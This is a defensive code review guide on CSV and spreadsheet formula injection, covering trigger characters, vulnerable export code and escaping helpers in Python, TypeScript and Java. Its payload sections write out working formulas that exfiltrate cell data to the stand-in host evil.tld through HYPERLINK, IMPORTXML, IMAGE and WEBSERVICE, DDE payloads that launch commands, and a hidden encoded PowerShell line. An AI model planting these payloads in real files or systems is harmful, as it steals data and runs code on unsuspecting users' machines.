CSV & Formula Injection Code Review Guide

01 //Introduction

CSV / formula injection, sometimes called spreadsheet formula injection, is a server-to-client attack that lives entirely outside the application's own runtime. An attacker submits a formula-shaped string (=HYPERLINK(...), =cmd|'/c calc'!A1, @SUM(...)) into any user-controlled input that will eventually appear in an exported spreadsheet. The application stores it as inert text. Hours or days later, an administrator clicks "Export to CSV", downloads the file, and opens it in Excel or LibreOffice. The formula then executes on their machine, with their permissions, against their documents.

The bug class is unusual in three ways. First, the attacker's input and the victim's machine are separated by a long time delay and by a human action. Second, the vulnerable component is the spreadsheet client (Excel, LibreOffice Calc, Numbers, Google Sheets), not the web application. That is why the application's WAF, CSP, and HTML escaping do nothing to stop it. Third, the victims are almost always internal: finance, support, ops, and compliance teams running batch exports. Because of who those victims are, phishing pivots and credential theft are especially valuable, and CSV injection has been popular with red teams and CTF authors since at least 2014.

CSV is not a file format

There is no single CSV specification. RFC 4180 documents one common dialect, but no spreadsheet vendor follows it strictly. Excel, LibreOffice, Numbers, and Google Sheets each parse CSV slightly differently: they differ in delimiter detection, quote handling, and formula-evaluation rules. Any code that emits "CSV" is therefore emitting permissive plain text that gets re-interpreted by whichever tool opens it. That re-interpretation is where the vulnerability lives.
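The following minimal sketch uses Python's standard csv module and an illustrative payload. The writer wraps the field in double quotes and doubles the embedded quotes, exactly as RFC 4180 requires. A conforming reader then returns the formula unchanged, leading = included. Quoting protects the column structure, not the person who opens the file.

```python
import csv
import io

# Illustrative attacker-controlled display name: it contains commas and
# double quotes, so an RFC 4180 writer must quote it.
payload = '=HYPERLINK("https://evil.tld/?c="&A2,"Click for prize")'

# Write one row with the standard-library writer (default: QUOTE_MINIMAL).
buf = io.StringIO()
csv.writer(buf).writerow(["42", payload])
line = buf.getvalue()

# Read it back. Quoting is undone on parse, so the cell text again starts
# with "=", which is exactly what a spreadsheet client would then evaluate.
parsed = next(csv.reader(io.StringIO(line)))

print(repr(line))
print(parsed[1] == payload, parsed[1][:1])
```

The written line is 42,"=HYPERLINK(""https://evil.tld/?c=""&A2,""Click for prize"")" followed by CRLF. A spreadsheet strips the outer quotes the same way csv.reader does.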

OWASP catalogued this class as CSV Injection after James Kettle's public 2014 write-up, "Comma Separated Vulnerabilities". The well-known =cmd|'/c calc'!A1 DDE proof-of-concept dates from the same period. The attack is still live a decade later for two reasons. Major spreadsheet programs still evaluate formulas in opened CSV files by default. And new export pipelines keep shipping with every admin dashboard that grows a "Download CSV" button.

An attacker registers an account with the display name `=HYPERLINK("https://evil.tld/?c="&A2,"Click for prize")`. The application HTML-encodes the name when rendering it on the web UI (so XSS is blocked), and stores it as plain text in PostgreSQL. Where does this become a vulnerability?

02 //The Attack Flow

Every CSV injection follows the same shape. A low-privilege attacker submits a formula-shaped payload into any field the application accepts. The application stores it untouched. Later, a higher-privilege user exports the data and opens the file. The application is just a courier; it is never the place where code executes. That structure gives the bug its long-range, persistence-like quality, and it is also what makes the bug invisible to most application-level scanners.

$ ./diagram --csv-injection-flow

1. Attacker: submits =cmd|'/c calc'!A1 in a name field
2. App stores it: plain text in the DB, nothing executes on the server
3. Admin exports: a CSV / XLSX report is delivered to the victim
4. Excel evaluates: the formula runs in the victim's OS context

⚠ key insight

The vulnerable code is not on the server that stored the data, and not on the server that generated the export. The vulnerability triggers in the spreadsheet client on the victim's machine, usually an admin, accountant, or analyst with elevated context. That is what makes this bug class so reliably high-impact: the victim is almost always someone whose desktop is worth compromising.

The shape of a realistic attack chain depends on what the spreadsheet client allows. Microsoft began hardening Dynamic Data Exchange (DDE) in late 2017, and current Excel builds either block DDE launches or prompt before them. Excel also shows a yellow warning bar for external content. Those mitigations are easy to defeat in practice. Most users click "Enable Content" reflexively, and several of the most damaging payloads (=HYPERLINK, =IMPORTXML, =IMAGE) do not trigger any warning at all.

Common Sink Surfaces in Real Applications

Where the export lives	Typical attacker-controlled fields
Admin "export users" CSV	username, display name, bio, address, support notes
Billing / invoice export	company name, line-item description, tax ID, memo
Support ticket dump	ticket subject, reporter name, last message, custom fields
Audit-log export	actor name, target resource path, free-text reason
CRM contact export	first/last/middle name, job title, notes, tags
Survey / form responses	every free-text answer, "other" text fields
Forum / community report	post title, post body, username, channel name
BI / analytics download	group-by labels, pivot row/column headers, dimension values
GDPR data-portability export	every field the user themselves can edit, practically all of them
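When reviewing an existing export, it helps to know which columns actually carry formula-shaped values. The following is a small audit sketch in Python. It assumes the export is available as a header plus rows, and the function names are hypothetical, not part of any library. It applies the full trigger rule from the Trigger Characters section. It will also flag legitimate values such as negative numbers or +44 phone numbers. Those are precisely the cells an escaper has to handle, so the false positives are informative.

```python
from typing import Iterable, Iterator, Sequence, Tuple

# Full trigger set from this guide: = + - @ plus a leading tab or carriage return.
TRIGGERS = frozenset("=+-@\t\r")


def looks_like_formula(cell: str) -> bool:
    """True if the cell starts with a trigger, or has one right after leading whitespace."""
    stripped = cell.lstrip("\t\r\n ")
    return cell[:1] in TRIGGERS or stripped[:1] in TRIGGERS


def find_formula_cells(
    header: Sequence[str], rows: Iterable[Sequence[object]]
) -> Iterator[Tuple[int, str, str]]:
    """Yield (row_number, column_name, value) for each formula-shaped cell.

    row_number counts data rows from 1; the header row is not counted.
    """
    for row_number, row in enumerate(rows, start=1):
        for column, value in zip(header, row):
            text = "" if value is None else str(value)
            if looks_like_formula(text):
                yield row_number, column, text


# Example: audit a small, made-up users export.
header = ["id", "email", "display_name", "bio"]
rows = [
    [1, "alice@example.com", "Alice", "hello"],
    [2, "mallory@example.com", '=HYPERLINK("https://evil.tld/?u="&B2,"View")', "hi"],
    [3, "bob@example.com", "Bob", "\t@SUM(1+1)"],
]
for hit in find_formula_cells(header, rows):
    print(hit)
```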

GDPR exports are a perfect carrier

Article 20 (right to data portability) requires apps to give users their data in a "structured, commonly used and machine-readable format", usually CSV or JSON. The user requesting the export is also the user supplying every value in it. CSV-formatted GDPR exports therefore default to a 100% attacker-controlled spreadsheet. Hand that file to a downstream consumer (legal, support, a migrating-to-competitor tool) and the formula fires. Several CVEs in 2019-2021 came from exactly this surface.

A typical vulnerable export endpoint (Node + csv-stringify)

```javascript
// VULNERABLE: csv-stringify quotes fields that contain commas and quotes,
// but it does NOT escape a leading = / + / - / @ character. The library is
// RFC-4180-correct; it is not formula-injection-safe by default.
// The application has to handle that itself.
import { stringify } from 'csv-stringify/sync';
import { db } from './db';

export async function exportUsersCsv(res) {
  const users = await db.query('SELECT id, email, display_name, bio FROM users');
  const rows = users.map(u => [u.id, u.email, u.display_name, u.bio]);

  res.setHeader('Content-Type', 'text/csv');
  res.setHeader('Content-Disposition', 'attachment; filename="users.csv"');
  res.send(stringify([['ID', 'Email', 'Name', 'Bio'], ...rows]));
}

// An attacker who sets display_name to
//   =HYPERLINK("https://evil.tld/?u="&B2,"View profile")
// produces a CSV in which the admin sees "View profile" in the Name column.
// Clicking it sends the contents of cell B2 (the email address of the first
// exported user) to evil.tld.
```

Your team patches the CSV export to prefix every cell with a single quote ('). A pentester reports that the XLSX export endpoint is still vulnerable. Why?

03 //Trigger Characters & Payload Anatomy

A cell is interpreted as a formula by the spreadsheet client when its first non-whitespace character is one of =, +, -, or @. Tab (\t) and carriage return (\r) are stripped first, so a field that begins with whitespace followed by a trigger is still evaluated. The naive defense "block fields starting with =" therefore misses three other prefixes and the whitespace-prefixed bypass.
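A quick way to settle the "we only block =" argument is to run the naive rule and the full rule side by side over the bypass payloads. The Python sketch below uses hypothetical function names. It implements the rule exactly as stated above: a cell is a formula if its first character is a trigger, or if the first character left after stripping leading whitespace is one.

```python
# Trigger set from this guide: = + - @ plus a leading tab or carriage return.
TRIGGERS = frozenset("=+-@\t\r")


def naive_is_formula(cell: str) -> bool:
    """The "we already block fields that start with =" rule."""
    return cell.startswith("=")


def is_formula(cell: str) -> bool:
    """Full rule: trigger first, or trigger first after stripping leading whitespace."""
    stripped = cell.lstrip("\t\r\n ")
    return cell[:1] in TRIGGERS or stripped[:1] in TRIGGERS


# Catalogue payloads that do not start with a bare "=".
BYPASSES = [
    "+SUM(1+9)*cmd|'/c calc'!A1",
    "-2+3+cmd|'/c calc'!A1",
    "@SUM(cmd|'/c calc'!A1)",
    "\t=cmd|'/c calc'!A1",
]

missed_by_naive = [p for p in BYPASSES if is_formula(p) and not naive_is_formula(p)]
print(f"naive rule misses {len(missed_by_naive)} of {len(BYPASSES)} payloads")
```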

$ ./diagram --formula-triggers

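Cell starts with → formula

= (canonical formula prefix)
+ (Excel and Calc interpret it as a formula)
- (Excel and Calc interpret it as a formula)
@ (Excel-only legacy formula prefix)
\t, \r (leading whitespace: stripped, then the next character is re-checked)
=cmd|..., =DDE(...) (DDE payloads: Excel's cmd| form on older Windows builds, Calc's DDE() function)

Cell starts with → literal text

'=... (a leading apostrophe forces text)
Any non-trigger character (letter, digit, space, punctuation other than = + - @)
Cell already typed as a string in XLSX (<c t="s"> or <c t="inlineStr">)

Not on the literal-text list: "=..." (CSV double-quoting). The quotes are field delimiters that the parser strips, so the formula is still evaluated.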

$ heuristic

The exhaustive trigger list is { '=', '+', '-', '@', '\t', '\r' }. Tab and carriage return matter because Excel strips leading whitespace before checking the first character. A field that starts with \t=cmd... is still a formula.

Payload Catalogue, What an Attacker Actually Writes

Payload	Effect	Modern default behaviour
=cmd|'/c calc'!A1	DDE: launches calc.exe on Windows under the user's privileges	Blocked or gated behind prompts in current Excel builds since the DDE hardening that began in late 2017, but still works on many older, unpatched corporate builds
=HYPERLINK("https://evil.tld/?x="&A2,"click me")	Renders a clickable hyperlink that sends a neighbouring cell to the attacker when clicked	The link renders with no security warning in Excel, LibreOffice, and Numbers; one click sends the data
=IMPORTXML("https://evil.tld/?x="&A2,"//x")	Google Sheets only: fetches a URL with a neighbouring cell concatenated; pure HTTP exfiltration	Executes without a click; classic Google Sheets data-leak primitive
=WEBSERVICE("https://evil.tld/?x="&A2)	Excel (Windows desktop) and LibreOffice Calc: fetches a URL with cell data; the response becomes the cell value	Not available in Excel for the web; prompts depend on client version and trust settings
=IMAGE("https://evil.tld/?x="&A2)	Google Sheets: fetches an image whose URL carries the exfiltrated data	Loads on sheet open
=DDE("cmd";"/c calc";"!A1")	LibreOffice Calc's DDE() function, the Calc counterpart of Excel's | form	DDE is blocked or prompted by default, but bypasses keep appearing
+SUM(1+9)*cmd|'/c calc'!A1	The + prefix variant, as effective as = on Excel and Calc	Often missed by deny-lists that only check for =
-2+3+cmd|'/c calc'!A1	The - prefix variant: looks like a negative number, evaluates as a formula	Slips past validation that allows a leading minus for negative values (e.g. balances)
@SUM(cmd|'/c calc'!A1)	Excel-only legacy @ prefix from Lotus 1-2-3 compatibility	Still recognised by Excel as a formula prefix; ignored by LibreOffice
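The catalogue doubles as a regression suite for whatever escaper a codebase adopts. The sketch below is Python and self-contained, with the helper repeated so it runs on its own. It pushes every payload above through an apostrophe-escaping helper and the standard csv writer, parses the result back, and asserts that each cell now starts with the apostrophe and is otherwise identical to the payload. The helper name csv_safe matches this guide's Python example, but the test itself is an illustration, not an existing tool.

```python
import csv
import io

_FORMULA_TRIGGERS = frozenset("=+-@\t\r")


def csv_safe(value) -> str:
    """Apostrophe-escape formula-shaped values (full trigger set)."""
    if value is None:
        return ""
    s = str(value)
    stripped = s.lstrip("\t\r\n ")
    if s[:1] in _FORMULA_TRIGGERS or stripped[:1] in _FORMULA_TRIGGERS:
        return "'" + s
    return s


# Every payload from the catalogue, plus the whitespace-prefixed bypass.
CATALOGUE = [
    "=cmd|'/c calc'!A1",
    '=HYPERLINK("https://evil.tld/?x="&A2,"click me")',
    '=IMPORTXML("https://evil.tld/?x="&A2,"//x")',
    '=WEBSERVICE("https://evil.tld/?x="&A2)',
    '=IMAGE("https://evil.tld/?x="&A2)',
    '=DDE("cmd";"/c calc";"!A1")',
    "+SUM(1+9)*cmd|'/c calc'!A1",
    "-2+3+cmd|'/c calc'!A1",
    "@SUM(cmd|'/c calc'!A1)",
    "\t=cmd|'/c calc'!A1",
]


def escaped_cells(payloads):
    """Write each payload through csv_safe + csv.writer, then parse the CSV back."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    for p in payloads:
        writer.writerow([csv_safe(p)])
    buf.seek(0)
    return [row[0] for row in csv.reader(buf)]


cells = escaped_cells(CATALOGUE)
for payload, cell in zip(CATALOGUE, cells):
    # After a full write/parse round trip, each cell must begin with the
    # apostrophe and otherwise match the original payload exactly.
    assert cell == "'" + payload, (payload, cell)
print(f"{len(cells)} payloads neutralised")
```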

Three payloads worth memorising

```text
# Exfiltration with no security warning; fires on click (Excel, Calc, Numbers).
=HYPERLINK("https://evil.tld/?leak=" & A2 & "_" & B2, "Click here for refund")

# HTTP GET when the sheet loads, Google Sheets specific, no user click required.
=IMPORTXML("https://evil.tld/?x=" & A2, "//x")

# Code execution via DDE on legacy Excel, still useful in enterprise environments.
=cmd|'/c powershell -nop -w hidden -enc <base64>'!A1
```

The "user must click Enable Content" excuse is not a control

Vendors and developers love to claim that Excel's yellow security bar makes CSV injection a non-issue. In practice, admins running batch exports of their own application data click "Enable Content" by reflex, because the file came from a trusted internal tool. =HYPERLINK, =IMPORTXML, and =IMAGE show no warning at all. Treat the warning bar as defense-in-depth, never as the primary control.

Exfiltration without leaving the spreadsheet

```text
# All of these payloads, placed in a username or display name field,
# exfiltrate the contents of cell B2 (in a users export, typically another
# user's email address or some other sensitive value) to
# attacker-controlled infrastructure.
#
# Google Sheets: fires when the sheet loads, no click needed.
=IMPORTXML("https://evil.tld/x?d=" & ENCODEURL(B2), "//a")
=IMAGE("https://evil.tld/x?d=" & ENCODEURL(B2))
=IMPORTDATA("https://evil.tld/x?d=" & ENCODEURL(B2))

# Excel desktop: fires on click, no Enable Content prompt.
=HYPERLINK("https://evil.tld/x?d=" & B2, "View record")

# Excel (Windows) and LibreOffice Calc: WEBSERVICE fetches the URL on
# recalculation, subject to each client's external-content settings.
=WEBSERVICE("https://evil.tld/x?d=" & B2)
```

A reviewer asks: 'we already block fields that start with =. Is that enough?' What is the correct answer?

04 //Mitigation Patterns

There are three correct mitigations, in rough order of preference. Use the right format (XLSX with explicit string typing); escape user-controlled text before it enters a CSV cell; or refuse to emit user data in spreadsheet formats at all, offering JSON or a typed download instead. Each has trade-offs; the right answer depends on who consumes the file.

Mitigation Options at a Glance

Strategy	How	When to use
Format change to typed XLSX	Emit XLSX with cell type = inline string. Excel will not evaluate a typed string cell.	Best when consumers have Excel, preserves rich formatting and is impervious to prefix tricks.
CSV with apostrophe escaping	Prefix every cell whose first char is = + - @ \t \r with a single quote (')	Standard "best effort" CSV mitigation. Works for Excel and Calc but the apostrophe is visible in some tools.
CSV with quote wrapping + escape	Wrap the cell in double quotes AND prefix the trigger character with apostrophe inside the quotes	Belt-and-braces, survives most edge cases including embedded newlines.
Strip / reject triggers	Reject any value whose first non-whitespace character is a trigger, or strip those characters	Useful when you control the input domain (numeric IDs, enum values), too lossy for free text.
Switch to JSON	Offer a typed JSON download instead of CSV	Best when the consumer is another program or a developer. No re-interpretation happens because JSON has no spreadsheet semantics.

The reference CSV-escape function (TypeScript)

```typescript
// lib/csv-safe.ts: a single canonical helper to use at every export site.
//
// Strategy: check the value's first character, and also the first character
// left after stripping the leading whitespace Excel itself strips. If either
// is a formula trigger, prefix the value with a single apostrophe so Excel
// treats it as literal text. Then run the value through a real CSV writer
// that handles quoting.
import { stringify } from 'csv-stringify/sync';

// Full trigger set: = + - @ plus a leading tab or carriage return.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

/** Returns a value safe to feed into any CSV writer. */
export function csvSafe(value: unknown): string {
  if (value === null || value === undefined) return '';
  const s = String(value);

  // Strip the leading whitespace Excel itself strips (tab, CR, LF, space),
  // then check both the raw first character and the first surviving one.
  const stripped = s.replace(/^[\t\r\n ]+/, '');

  if (FORMULA_TRIGGERS.has(s.charAt(0)) || FORMULA_TRIGGERS.has(stripped.charAt(0))) {
    return "'" + s;
  }
  return s;
}

// Use the helper at EVERY export site. Do not pass raw values through.
// Excerpt from an export handler: `res`, `headers` and `rows` come from it.
res.send(
  stringify([
    headers,
    ...rows.map(r => r.map(csvSafe)),
  ])
);
```

The apostrophe is visible in some tools

When Excel and LibreOffice import a CSV cell that starts with ', they treat the rest as text and hide the apostrophe in the cell value. Python's csv module, pandas.read_csv, and most BI ingestion pipelines do not strip the apostrophe; they read the raw characters. If your consumer is another program, undo the escape on the consumer side or use a typed format. Apostrophe escaping is for human-opened CSV, not for machine-consumed CSV.
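The following Python sketch shows both halves of that point. csv.reader hands a program the apostrophe as ordinary data, and a hypothetical consumer-side helper removes it again. The helper strips the apostrophe only when the remainder is something the producer would have escaped, so a name like O'Brien is untouched. It is still lossy in one case: if an original value itself began with an apostrophe followed by a trigger, the producer would not have escaped it, and this helper would alter it. That ambiguity is one more reason to prefer a typed format for program consumers.

```python
import csv
import io

TRIGGERS = frozenset("=+-@\t\r")


def undo_formula_escape(cell: str) -> str:
    """Hypothetical consumer-side inverse of apostrophe escaping.

    Drops one leading apostrophe only when the remainder starts with a
    trigger, possibly after leading whitespace. Other apostrophes are kept.
    """
    if cell.startswith("'"):
        rest = cell[1:]
        stripped = rest.lstrip("\t\r\n ")
        if rest[:1] in TRIGGERS or stripped[:1] in TRIGGERS:
            return rest
    return cell


# A CSV as written by an apostrophe-escaping producer.
data = "id,balance,name\r\n1,'-42.50,O'Brien\r\n"
rows = list(csv.reader(io.StringIO(data)))

# csv.reader keeps the apostrophe: to a program it is ordinary data.
print(rows[1])
# Undo the producer's escape before treating the value as a number.
print(undo_formula_escape(rows[1][1]))
```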

Python equivalent

```python
# lib/csv_safe.py
import csv

# Full trigger set: = + - @ plus a leading tab or carriage return.
_FORMULA_TRIGGERS = {"=", "+", "-", "@", "\t", "\r"}

def csv_safe(value) -> str:
    if value is None:
        return ""
    s = str(value)
    # Strip the leading whitespace Excel itself strips, then check both the
    # raw first character and the first surviving one.
    stripped = s.lstrip("\t\r\n ")
    if s[:1] in _FORMULA_TRIGGERS or stripped[:1] in _FORMULA_TRIGGERS:
        return "'" + s
    return s

# Always pipe through csv_safe before writing.
def write_users_csv(users, fp):
    w = csv.writer(fp)
    w.writerow(["id", "email", "display_name", "bio"])
    for u in users:
        w.writerow([
            u.id,
            csv_safe(u.email),
            csv_safe(u.display_name),
            csv_safe(u.bio),
        ])
```
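The "CSV with quote wrapping + escape" row from the mitigation table maps directly onto the standard library. Pass quoting=csv.QUOTE_ALL so that every field is wrapped in double quotes, and keep csv_safe for the apostrophe. The sketch below is self-contained: a hypothetical User dataclass stands in for the application's model, and the helper is repeated so the block runs on its own.

```python
import csv
import io
from dataclasses import dataclass

_FORMULA_TRIGGERS = frozenset("=+-@\t\r")


def csv_safe(value) -> str:
    """Mirrors the csv_safe helper above (full trigger set)."""
    if value is None:
        return ""
    s = str(value)
    stripped = s.lstrip("\t\r\n ")
    if s[:1] in _FORMULA_TRIGGERS or stripped[:1] in _FORMULA_TRIGGERS:
        return "'" + s
    return s


@dataclass
class User:
    """Hypothetical stand-in for the application's user model."""
    id: int
    email: str
    display_name: str
    bio: str


def write_users_csv_quoted(users, fp):
    # QUOTE_ALL wraps every field (numbers included) in double quotes;
    # csv_safe supplies the apostrophe for formula-shaped values.
    w = csv.writer(fp, quoting=csv.QUOTE_ALL)
    w.writerow(["id", "email", "display_name", "bio"])
    for u in users:
        w.writerow([u.id, csv_safe(u.email), csv_safe(u.display_name), csv_safe(u.bio)])


buf = io.StringIO()
write_users_csv_quoted([User(1, "a@example.com", "=1+1", "line one\nline two")], buf)
output = buf.getvalue()
print(output)
```

The embedded newline in the bio stays inside its quoted field. The display name is written as "'=1+1", so a spreadsheet shows it as text.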

Java equivalent (library-agnostic helper; usage shown with Apache Commons CSV)

```java
import java.util.Set;

public final class CsvSafe {
    // Full trigger set: = + - @ plus a leading tab or carriage return.
    private static final Set<Character> TRIGGERS =
        Set.of('=', '+', '-', '@', '\t', '\r');

    private CsvSafe() {}

    public static String escape(Object value) {
        if (value == null) return "";
        String s = value.toString();
        if (s.isEmpty()) return s;
        // Skip the leading whitespace Excel strips before checking.
        int i = 0;
        while (i < s.length()) {
            char c = s.charAt(i);
            if (c == '\t' || c == '\r' || c == '\n' || c == ' ') i++;
            else break;
        }
        // Check both the raw first character and the first surviving one.
        if (TRIGGERS.contains(s.charAt(0))
                || (i < s.length() && TRIGGERS.contains(s.charAt(i)))) {
            return "'" + s;
        }
        return s;
    }
}

// Use at every export site. Excerpt: `printer` is an Apache Commons CSV
// CSVPrinter and `users` comes from the surrounding export handler.
for (User u : users) {
    printer.printRecord(
        u.getId(),
        CsvSafe.escape(u.getEmail()),
        CsvSafe.escape(u.getDisplayName()),
        CsvSafe.escape(u.getBio())
    );
}
```

One helper per codebase, used everywhere

The pattern that works in practice is the same as for secure randomness or HTML escaping: a single csvSafe() helper in a shared library, with a lint or grep rule that flags any CSV writer that is not fed through it. The helper is about a dozen lines of code. The discipline is what matters: every new export endpoint must use the helper, and code review enforces that.
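A deliberately crude starting point for that grep rule, in Python, is shown below. The patterns and the function name are assumptions, not an existing tool. It flags any line that calls a common CSV writer method (writerow, writerows, stringify, printRecord) when none of this guide's helper names appears within the next few lines. Expect false positives on header rows built from string literals, and false negatives when an unrelated helper call happens to sit nearby. A production rule belongs in Semgrep or CodeQL.

```python
import re
from typing import List

# Heuristic patterns (assumptions; adjust to your codebase): calls to common
# CSV writer methods, and the helper names used in this guide.
WRITER_CALL = re.compile(r"\b(writerow|writerows|stringify|printRecord)\s*\(")
HELPER = re.compile(r"\b(csv_safe|csvSafe|CsvSafe\.escape)\b")


def flag_unescaped_writes(source: str, window: int = 6) -> List[int]:
    """Return 1-based line numbers of CSV writer calls with no helper nearby.

    "Nearby" means the call line plus the following window - 1 lines, so a
    multi-line writerow([...]) that uses the helper is not flagged.
    """
    lines = source.splitlines()
    flagged = []
    for i, line in enumerate(lines):
        if WRITER_CALL.search(line):
            context = "\n".join(lines[i : i + window])
            if not HELPER.search(context):
                flagged.append(i + 1)
    return flagged


sample = "w.writerow([u.id, csv_safe(u.bio)])\nw.writerow([u.id, u.bio])\n"
print(flag_unescaped_writes(sample))
```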

A developer proposes: 'just strip the leading = / + / - / @ from any field before exporting.' Why is that worse than prefixing with an apostrophe?

05 //Conclusion

CSV / formula injection is a textbook case of trust transferred across a layer that nobody owns. The application is correct; the CSV writer is correct; Excel is correct. The vulnerability lives in the seam between them: the moment a string the application treated as a value becomes a string the spreadsheet treats as a formula. Fix it the same way every adjacent bug class is fixed: a single helper, applied everywhere, enforced in CI, and paired with a format change for the machine-consumed paths.

Review Checklist Recap

Treat = + - @ \t \r as the full trigger set, not just = · Apostrophe-prefix every user-controlled CSV cell that starts with a trigger, including after leading whitespace · Explicitly type every user-controlled XLSX/ODS cell as string · Centralise the escape in one helper, used at every export site · Prefer JSON for machine consumers, XLSX-with-typed-cells for human consumers · Add a Semgrep / CodeQL rule that flags raw CSV writes without the helper · Treat the spreadsheet client's "Enable Content" warning as defense-in-depth, never as the primary control.

When you see a new export endpoint in a diff, the first question is not "does it produce a valid file", it is "what does the consumer do with this file?" If the answer involves Excel, LibreOffice, Numbers, or Google Sheets, every user-controlled string in the file is potentially executable code. The fix is one helper away. Pair this module with the HTTP Header Injection, Server-Side Template Injection, and Secure Logging Practices guides for the adjacent classes where the bug is "an output sink reinterprets your data as something more dangerous."

Learn the patterns,
then go find them.
